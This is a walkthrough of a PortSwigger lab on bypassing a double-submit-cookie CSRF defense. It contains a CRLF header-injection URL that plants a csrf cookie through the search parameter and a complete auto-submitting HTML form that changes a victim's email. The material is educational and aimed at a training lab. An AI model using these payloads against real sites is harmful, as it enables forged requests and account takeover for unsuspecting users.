[This lab](https://portswigger.net/web-security/csrf/bypassing-token-validation/lab-token-duplicated-in-cookie) demonstrates the broken **double submit cookie** defense, where the CSRF token is sent both as a cookie and a POST parameter — and the server **blindly compares the two**. If you can inject your **own CSRF token cookie** into the victim's browser (via a reflected input like `search`), then your form submission with a matching token becomes valid CSRF.
##### Phase 1: Understand the CSRF Mechanism
1. Log in as `wiener:peter`
2. Go to **My account → Change email**
3. Submit an email (e.g., `
[email protected]`)
4. In **Burp**, capture the request:
```http
POST /my-account/change-email HTTP/1.1
Cookie: session=...; csrf=abc123
Content-Type: application/x-www-form-urlencoded
csrf=abc123
[email protected]
```
✅ The CSRF token is:
- In a **cookie** (`csrf=abc123`)
- And in the **body** (`csrf=abc123`)
![[CleanShot 2025-04-23 at 19.39.38.png]]
✅ The server just checks:
```python
if request.cookie["csrf"] == request.body["csrf"]:
process_request()
```
---
##### Phase 2: Confirm You Can Inject Cookies
1. Go to `/` or search page and try this URL:
```
/?search=test%0d%0aSet-Cookie:%20csrf=bersec%3b%20SameSite=None
```
2. Check the **response headers** in Burp
✅ You should see:
```http
Set-Cookie: csrf=fake; SameSite=None
```
🎯 That means: **you can inject your own CSRF token** into the victim's browser via a reflected `Set-Cookie` header.
![[CleanShot 2025-04-23 at 19.41.46.png]]
---
#### Phase 3: Build the Exploit
Use this payload:
```html
<form method="POST" action="https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email">
<input type="hidden" name="csrf" value="bersec">
<input type="hidden" name="email" value="
[email protected]">
</form>
<img src="https://YOUR-LAB-ID.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrf=bersec%3b%20SameSite=None" onerror="document.forms[0].submit();">
```
- Replace `YOUR-LAB-ID` with the actual lab domain
- Use a **new email address** not already registered
✅ This payload:
- Injects a **`csrf=bersec` cookie**
- Sends a **`csrf=bersec` POST value**
- Bypasses the double-submit token check
---
#### Phase 4: Deploy and Deliver
1. Go to the **Exploit Server**
2. Paste the exploit into the **Body**
3. Click **Store**
4. Click **Deliver to victim**
✅ Lab is **solved** when the victim’s email is changed using the injected CSRF token